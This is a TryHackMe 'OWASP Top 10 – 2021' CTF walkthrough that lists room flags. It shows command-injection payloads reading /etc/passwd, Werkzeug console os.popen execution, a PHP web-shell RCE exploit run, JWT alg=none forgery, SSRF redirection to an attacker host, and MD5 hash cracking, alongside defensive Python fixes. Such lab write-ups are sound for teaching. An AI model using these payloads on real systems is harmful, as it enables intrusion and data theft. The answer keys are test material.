In this walkthrough, we will be going through the OWASP Top 10 – 2021 room from TryHackMe. This room has been designed to teach us about the OWASP Top 10 vulnerabilities, the critical web security risks behind them, and how to exploit them in detail. So, let’s get started without any delay.

Task 3 – 1. Broken Access Control

Task 4 – Broken Access Control (IDOR Challenge)
Question 1 – Read and understand how IDOR works.
Done
Question 2 – Deploy the machine and go to http://10.10.192.147 – Login with the username noot and the password test1234.
Done


Question 3 – Look at other users’ notes. What is the flag?
- In the beginning, the id parameter is set to 1. Increment it to exploit the IDOR. At 5, the page gives a hint that we should go lower than 1, so we tried “0” and found our flag.

flag{fivefourthree}
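The fix for the IDOR above is an ownership check on every object lookup. The following is an added example, not code from the room or from this post: a constructed in-memory notes table (the flag text is a placeholder), the vulnerable lookup that trusts the id from the URL, and the hardened lookup that scopes the query to the authenticated user.

```python
from typing import Dict, Tuple

# Constructed sample data standing in for the room's notes table:
# note id -> (owner username, note body). The flag text is a placeholder.
NOTES: Dict[int, Tuple[str, str]] = {
    0: ("admin", "flag{placeholder-not-the-room-flag}"),
    1: ("noot", "noot's own note"),
    2: ("alice", "alice's private note"),
}


class Forbidden(Exception):
    """Raised when the caller asks for an object it does not own."""


def get_note_idor(note_id: int) -> str:
    """Vulnerable pattern behind Task 4: the id comes straight from the URL
    (?id=1) and nothing ties it to the logged-in user, so any user can walk
    the id space (2, 3, ..., 0) and read every note."""
    return NOTES[note_id][1]


def get_note_checked(note_id: int, current_user: str) -> str:
    """Hardened: the lookup is scoped to the authenticated user. A note you
    do not own and a note that does not exist produce the same error, so the
    id space cannot be enumerated either."""
    owner, body = NOTES.get(note_id, (None, None))
    if owner != current_user:
        raise Forbidden(f"note {note_id} is not accessible to {current_user!r}")
    return body


def can_read(note_id: int, current_user: str) -> bool:
    """Convenience wrapper: True only when the ownership check passes."""
    try:
        get_note_checked(note_id, current_user)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    print(get_note_idor(0))       # what walking the id space yields
    print(can_read(0, "noot"))    # False once the check is in place
```

The detection side is the mirror image: a user requesting many sequential ids, or ids that belong to other users, is a pattern worth alerting on in the application logs.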

Task 5 – 2. Cryptographic Failures

Task 6 – Cryptographic Failures (Supporting Material 1)
Question 1 – Read and understand the supporting material on SQLite Databases.
Done

Task 7 – Cryptographic Failures (Supporting Material 2)
Question 1 – Read the supporting material about cracking hashes.
Done

Task 8 – Cryptographic Failures (Challenge)
Question 1 – What is the name of the mentioned directory?


/assets
Question 2 – Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

webapp.db
Question 3 – Use the supporting material to access the sensitive data. What is the password hash of the admin user?
wh1terose@fsociety:~/CTF/TryHackme/OWASP Top 10 - 2021$ ls
webapp.db
wh1terose@fsociety:~/CTF/TryHackme/OWASP Top 10 - 2021$ sqlite3 webapp.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
sessions  users
sqlite> PRAGMA table_info(sessions);
0|sessionID|TEXT|1||1
1|userID|TEXT|1||0
2|expiry|INT|1||0
sqlite> PRAGMA table_info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite> SELECT * FROM users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite>

6eea9b7ef19179a06954edd0f6c05ceb
Question 4 – Crack the hash. What is the admin’s plaintext password?

qwertyuiop
Question 5 – Log in as the admin. What is the flag?

THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
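Why the admin hash fell so quickly, and what the users table should have stored instead: an added example (not the room's code) that runs the same dictionary check an auditor would run against the unsalted MD5 value from webapp.db, next to a salted PBKDF2 scheme from the standard library. The five-word wordlist is constructed and stands in for rockyou.txt.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Admin hash from the room's webapp.db users table (value from the page).
ADMIN_MD5 = "6eea9b7ef19179a06954edd0f6c05ceb"

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "123456", "letmein", "qwertyuiop", "admin123"]

PBKDF2_ITERATIONS = 600_000  # OWASP's current guidance for PBKDF2-HMAC-SHA256


def md5_dictionary_check(target_hex: str, words: Iterable[str]) -> Optional[str]:
    """Audit check: does any candidate word hash to the stored digest?
    Unsalted MD5 is fast and deterministic, so one hash per word is enough
    and precomputed tables work, which is why the Task 8 hash falls instantly."""
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == target_hex:
            return word
    return None


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """What the users table should have held: a per-user random salt and a
    slow KDF. Stored as 'pbkdf2_sha256$<iterations>$<salt hex>$<key hex>'."""
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${key.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, compare in constant time."""
    try:
        scheme, iterations, salt_hex, key_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    key = hashlib.pbkdf2_hmac("sha256", password.encode(),
                              bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(key.hex(), key_hex)


if __name__ == "__main__":
    print(md5_dictionary_check(ADMIN_MD5, WORDLIST))   # recovered in one pass
    record = hash_password("qwertyuiop")
    print(record, verify_password("qwertyuiop", record))
```

With the salted scheme the same weak password is still guessable, but each guess costs 600,000 HMAC iterations and has to be repeated per user, so a leaked database no longer cracks in seconds. Password policy and the leaked /assets directory are separate problems; this only addresses the storage format.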

Task 9 – 3. Injection

Task 10 – 3.1. Command Injection
Question 1 – What strange text file is in the website’s root directory?
$(ls)

drpepper.txt
Question 2 – How many non-root/non-service/non-daemon users are there?
$(ps -ef)

0
Question 3 – What user is this app running as?
apache
Question 4 – What is the user’s shell set as?
$(grep "apache" /etc/passwd)

/sbin/nologin
Question 5 – What version of Alpine Linux is running?
$(cat /etc/alpine-release)

3.16.0
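The payloads in Task 10 work because user input is pasted into a shell command string. The following is an added example (not the room's application code) showing that pattern beside the hardened version: an allowlist pattern for the hostname, then an argv list handed to subprocess with no shell involved. The ping command and the hostname regex are this example's own choices.

```python
import re
import subprocess
from typing import List

# Hostnames: labels of letters, digits, dots and hyphens, not starting with
# a hyphen (so the value can never be parsed as an option such as "-c").
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def build_vulnerable_command(host: str) -> str:
    """The pattern behind Task 10: user input pasted into a shell string.
    With host = '$(ls)' the shell expands the substitution before ping ever
    runs, so the directory listing ends up in the response."""
    return f"ping -c 1 {host}"


def is_safe_hostname(host: str) -> bool:
    return HOSTNAME_RE.fullmatch(host) is not None


def safe_argv(host: str) -> List[str]:
    """Hardened: validate against an allowlist pattern, then build an argv
    list. No shell is involved, so $(), ;, | and backticks are just bytes."""
    if not is_safe_hostname(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]


def ping_safely(host: str) -> subprocess.CompletedProcess:
    # shell=False is the default for a list argv; keep a timeout so the
    # request handler cannot hang on an unreachable host.
    return subprocess.run(safe_argv(host), capture_output=True, text=True, timeout=5)


if __name__ == "__main__":
    print(build_vulnerable_command("$(cat /etc/alpine-release)"))
    print(safe_argv("10.10.151.53"))
```

The validation is there for argument injection, not just shell metacharacters: even with an argv list, a value starting with "-" would be read by ping as an option, which is why the pattern forbids a leading hyphen.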

Task 11 – 4. Insecure Design
Question 1 – Try to reset joseph’s password. Keep in mind the method used by the site to validate if you are indeed joseph.
Done
Question 2 – What is the value of the flag in joseph’s account?
- Upon looking on the login panel, we can see a “I forgot my password” hyperlink on the bottom right corner.


- The password Reset screen asks for a username for which we want to perform password reset. Enter – joseph

- Next, we are prompted with a set of security questions. Among the three, the one asking for a favourite colour looks the easiest to guess. We tried a bunch of colours and got lucky on “green”.

- We got a new password for the user and logged into the portal with it.
1KZQpxvE6yfrqt

- The Private Container holds our flag. Open it up and claim it.


THM{Not_3ven_c4tz_c0uld_sav3_U!}

Task 12 – 5. Security Misconfiguration
Question 1 – Navigate to http://10.10.151.53:86/console to access the Werkzeug console.
Done
Question 2 – What is the database file name (the one with the .db extension) in the current directory?
- Use the Werkzeug console to run the following Python code to execute the ls -l command on the server:
import os; print(os.popen("ls -l").read())

todo.db
Question 3 – Modify the code to read the contents of the app.py file, which contains the application’s source code. What is the value of the secret_flag variable in the source code?
- Used the following command to get the flag hidden in the source code:
import os; print(os.popen("cat app.py").read())

THM{Just_a_tiny_misconfiguration}

Task 13 – 6. Vulnerable and Outdated Components

Task 14 – Vulnerable and Outdated Components – Exploit
Question 1 – Read the above!
Done

Task 15 – Vulnerable and Outdated Components – Lab
Question 1 – What is the content of the /opt/flag.txt file?
- The target web application is a bookstore written in PHP. In the bottom right corner, we can see “2017”, which suggests it might be vulnerable.


- Googling for CSE Bookstore 2017 vulnerabilities led me to this exploit: an unauthenticated RCE in Online Book Store 1.0.
Exploit: https://www.exploit-db.com/exploits/47887

- Downloading the exploit and running it against the application gives us the required flag.
wh1terose@fsociety:~/CTF/TryHackme/OWASP Top 10 - 2021$ python3 47887.py http://10.10.151.53:84/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.151.53:84/bootstrap/img/lXgjjmC5EL.php
> Example command usage: http://10.10.151.53:84/bootstrap/img/lXgjjmC5EL.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ cat /opt/flag.txt
THM{But_1ts_n0t_my_f4ult!}
RCE $

THM{But_1ts_n0t_my_f4ult!}

Task 16 – 7. Identification and Authentication Failures

Task 17 – Identification and Authentication Failures Practical
Question 1 – What is the flag that you found in darren’s account?
- Try registering the user with a space in front: “ darren”. Once created, log in and get the flag.

fe86079416a21a3c99937fea8874b667
Question 2 – Now try to do the same trick and see if you can log in as arthur.
Done


Question 3 – What is the flag that you found in arthur’s account?

d9ac0f7db4fda460ac3edeb75d75e16e
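The “ darren” trick works when the registration uniqueness check and the rest of the application disagree about what a username is. The following is an added example, not the room's code: a constructed in-memory user store with the raw-string check beside a version that canonicalises the name (NFKC normalisation, whitespace stripped, casefolded) before deciding whether it already exists.

```python
import unicodedata
from typing import Dict


class UserStore:
    """Constructed in-memory user store modelling the room's registration flow."""

    def __init__(self) -> None:
        self.users: Dict[str, str] = {}  # stored key -> display name

    @staticmethod
    def canonical(username: str) -> str:
        """NFKC-normalise, strip surrounding whitespace and casefold, so that
        ' darren', 'Darren' and full-width lookalikes all become 'darren'."""
        return unicodedata.normalize("NFKC", username).strip().casefold()

    def register_unsafe(self, username: str) -> bool:
        """The weakness behind Task 17: the uniqueness check compares the raw
        string, so ' darren' counts as new even though 'darren' exists, and the
        application then treats the new account as darren's."""
        if username in self.users:
            return False
        self.users[username] = username
        return True

    def register(self, username: str) -> bool:
        """Hardened: uniqueness is decided on the canonical form, and that same
        form is what gets stored and used for every later lookup."""
        key = self.canonical(username)
        if not key or key in self.users:
            return False
        self.users[key] = key
        return True


if __name__ == "__main__":
    store = UserStore()
    store.register("darren")
    print(store.register_unsafe(" darren"))  # True: lookalike accepted
    print(store.register(" darren"))         # False: collision detected
```

The important property is that the same canonical form is used everywhere (registration, login, password reset, display), so there is no code path left where two strings can be “different” for one check and “the same” for another.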

Task 18 – 8. Software and Data Integrity Failures
Question 1 – Read the above and continue!
Done

Task 19 – Software Integrity Failures
Question 1 – What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js?

sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=
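The value above is a Subresource Integrity (SRI) string: the algorithm name, a hyphen, and the base64 of the raw digest. The following is an added example, not from the page, that builds such a value from file content, emits the script tag, and verifies content against an integrity string the way a browser does; the script content is constructed, not jQuery, so the resulting hash differs from the page's.

```python
import base64
import hashlib
import hmac

SRI_ALGORITHMS = {"sha256", "sha384", "sha512"}  # the only ones the SRI spec allows


def sri_hash(content: bytes, algo: str = "sha256") -> str:
    """Subresource Integrity value: '<algo>-' + base64(raw digest)."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def script_tag(src: str, content: bytes) -> str:
    """Tag to ship in the HTML; crossorigin is required for cross-origin SRI."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            'crossorigin="anonymous"></script>')


def verify_sri(content: bytes, integrity: str) -> bool:
    """What the browser does: recompute and compare; a mismatch blocks the load."""
    algo, _, _expected = integrity.partition("-")
    if algo not in SRI_ALGORITHMS:
        return False
    return hmac.compare_digest(sri_hash(content, algo), integrity)


if __name__ == "__main__":
    # Constructed script body standing in for a CDN-hosted library.
    body = b"console.log('constructed example');"
    print(script_tag("https://cdn.example.invalid/lib.js", body))
    print(verify_sri(body, sri_hash(body)), verify_sri(body + b"//x", sri_hash(body)))
```

On the command line the same value for a real file is `openssl dgst -sha256 -binary FILE | openssl base64 -A`; pin the hash of the exact version you reviewed, and the CDN can no longer swap the file underneath you without the browser refusing it.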

Task 20 – Data Integrity Failures
Question 1 – Try logging into the application as guest. What is guest’s account password?
- Try entering some random password for the user “guest”. The error message will reveal the “password” for it.

- If your login was successful, you should now have a JWT stored as a cookie in your browser. Press F12 to bring up the Developer Tools. Depending on your browser (Firefox or Chrome), you will be able to edit cookies from the corresponding storage tab.

guest
Question 2 – What is the name of the website’s cookie containing a JWT token?
- Open up browser’s developer console and navigate to Storage -> Cookies.

jwt-session
Question 3 – Use the knowledge gained in this task to modify the JWT token so that the application thinks you are the user “admin”.
Done
- Next, we have to modify the JWT. The token has three dot-separated parts; the first is the header, which holds the hash algorithm.

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjg3OTAwNzk3fQ.wolRWvkEIThUxW_fLQkXPgp-PWcojfaOxPL0d62A1rA

- Change the hash algorithm to “none” and encode the header back with base64:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0

- Now go to the second part of the string, which is the payload. Change the username from guest to admin and encode it back with base64:
eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjg3OTAwNzk3fQ==

- Combine the encoded header and payload (leaving the signature part empty), replace the cookie and refresh the page. It will give you the flag.
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc5ODY1MDU5fQ==.
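The forgery works only because the server lets the token choose its own algorithm. The following is an added example, not the room's code: a minimal HS256 signer and a verifier (standard library only) that checks a server-side algorithm allowlist before trusting anything else, then the signature, then expiry. The forged token from the page is embedded verbatim (padding included) so the rejection can be seen; the secret is a constructed value.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Dict, Optional

ALLOWED_ALGS = {"HS256"}  # server-side policy; never taken from the token


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    # Tolerates both unpadded (standard JWT) and '='-padded segments.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _compact(obj: Dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def sign_hs256(claims: Dict, secret: bytes) -> str:
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = f"{b64url_encode(_compact(header))}.{b64url_encode(_compact(claims))}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify(token: str, secret: bytes, now: Optional[float] = None) -> Dict:
    """Checks, in order: structure, algorithm allowlist, signature, expiry.
    The alg check runs before any claim is trusted, which is what stops
    the 'none' trick used in Task 20."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h_b64, p_b64, s_b64 = parts
    header = json.loads(b64url_decode(h_b64))
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        raise ValueError(f"algorithm not allowed: {header!r}")
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(p_b64))
    now = time.time() if now is None else now
    if not isinstance(claims.get("exp"), (int, float)) or claims["exp"] <= now:
        raise ValueError("token expired or has no exp")
    return claims


def is_valid(token: str, secret: bytes, now: Optional[float] = None) -> bool:
    try:
        verify(token, secret, now)
        return True
    except (ValueError, KeyError, AttributeError, UnicodeDecodeError):
        return False


# The forged alg=none token from the page, kept verbatim (including padding).
FORGED_NONE_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=."
                     "eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc5ODY1MDU5fQ==.")

if __name__ == "__main__":
    secret = b"constructed-demo-secret"
    print(is_valid(FORGED_NONE_TOKEN, secret))                      # False
    tok = sign_hs256({"username": "guest", "exp": 2_000_000_000}, secret)
    print(verify(tok, secret))
```

The same idea applies when using a JWT library: pass the algorithm list explicitly to the decode call, and treat a header that names anything else as an attack indicator worth logging, since a legitimate client never changes it.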



Task 21 – 9. Security Logging and Monitoring Failures
Question 1 – What IP address is the attacker using?
wh1terose@fsociety:~/CTF/TryHackme/OWASP Top 10 - 2021$ cat login-logs.txt
200 OK 12.55.22.88 jr22 2019-03-18T09:21:17 /login
200 OK 14.56.23.11 rand99 2019-03-18T10:19:22 /login
200 OK 17.33.10.38 afer11 2019-03-18T11:11:44 /login
200 OK 99.12.44.20 rad4 2019-03-18T11:55:51 /login
200 OK 67.34.22.10 bff1 2019-03-18T13:08:59 /login
200 OK 34.55.11.14 hax0r 2019-03-21T16:08:15 /login
401 Unauthorised 49.99.13.16 admin 2019-03-21T21:08:15 /login
401 Unauthorised 49.99.13.16 administrator 2019-03-21T21:08:20 /login
401 Unauthorised 49.99.13.16 anonymous 2019-03-21T21:08:25 /login
401 Unauthorised 49.99.13.16 root 2019-03-21T21:08:30 /login

49.99.13.16
Question 2 – What kind of attack is being carried out?
Brute Force

Task 22 – 10. Server-Side Request Forgery (SSRF)
Question 1 – Explore the website. What is the only host allowed to access the admin area?
- http://10.10.151.53:8087/admin

localhost
Question 2 – Check the “Download Resume” button. Where does the server parameter point to?
- http://10.10.151.53:8087/download?server=secure-file-storage.com:8087&id=75482342
secure-file-storage.com
Question 3 – Using SSRF, make the application send the request to your AttackBox instead of the secure file storage. Are there any API keys in the intercepted request?
- 10.10.151.53:8087/download?server=10.18.11.103:4444&id=75482342

THM{Hello_Im_just_an_API_key}
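The download endpoint above forwards a request to whatever host the server parameter names, which is the whole SSRF. The following is an added example, not the room's code, of the hardened form: the parameter is parsed strictly, loopback/private literals and “localhost” (the only host the admin area trusts) are refused, and the host:port pair must match a server-side allowlist. The allowlist and the /files/<id> path are this example's assumptions.

```python
import ipaddress
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Constructed allowlist: the one backend the download endpoint may contact.
ALLOWED_SERVERS = {("secure-file-storage.com", 8087)}


def parse_server(value: str) -> Optional[Tuple[str, int]]:
    """Parse 'host:port' strictly. Credentials, a path, a query or a fragment
    cause rejection rather than 'cleaning', because those are the usual ways
    an allowlist check and the request actually sent end up disagreeing."""
    try:
        parts = urlsplit("//" + value)
        if parts.username or parts.password or parts.path or parts.query or parts.fragment:
            return None
        if not parts.hostname or parts.port is None:
            return None
        return parts.hostname, parts.port
    except ValueError:  # e.g. non-numeric port
        return None


def is_internal_host(host: str) -> bool:
    """True for loopback/private/link-local literals and for 'localhost'."""
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; the allowlist decides
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved


def is_allowed_server(value: str) -> bool:
    parsed = parse_server(value)
    return parsed is not None and not is_internal_host(parsed[0]) and parsed in ALLOWED_SERVERS


def build_download_url(server: str, file_id: str) -> str:
    """Hardened form of /download?server=...&id=...: only allowlisted hosts are
    contacted, so server=10.18.11.103:4444 or localhost:8087 is refused.
    The /files/<id> path is an assumption of this example."""
    if not is_allowed_server(server):
        raise ValueError(f"server not allowed: {server!r}")
    if not file_id.isdigit():
        raise ValueError("id must be numeric")
    host, port = parse_server(server)
    return f"http://{host}:{port}/files/{file_id}"


if __name__ == "__main__":
    print(build_download_url("secure-file-storage.com:8087", "75482342"))
    print(is_allowed_server("10.18.11.103:4444"), is_allowed_server("localhost:8087"))
```

Better still is not to accept a server parameter at all and look the backend up from the id on the server side; where the parameter must stay, the allowlist should be checked against the address actually connected to (after DNS resolution and with redirects disabled), since an allowlisted name that resolves to an internal address reopens the hole.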

Task 23 – What Next?

So that was “OWASP Top 10 – 2021” for you. In this room, we have covered the OWASP Top 10 web application vulnerabilities and their exploitation. We covered vulnerabilities like Broken Access Control, which includes IDOR, and more. Then we took a dive into Cryptographic Failures. Moving on, we learned about Injection, Insecure Design, Security Misconfiguration, Vulnerable and Outdated Components, Identification and Authentication Failures, SSRF, and much more. This room was certainly very lengthy, but it covers everything in great detail regarding the OWASP Top 10 risks and vulnerabilities. On that note, I will take my leave and will meet you in the next one. Till then, “Keep Hacking”.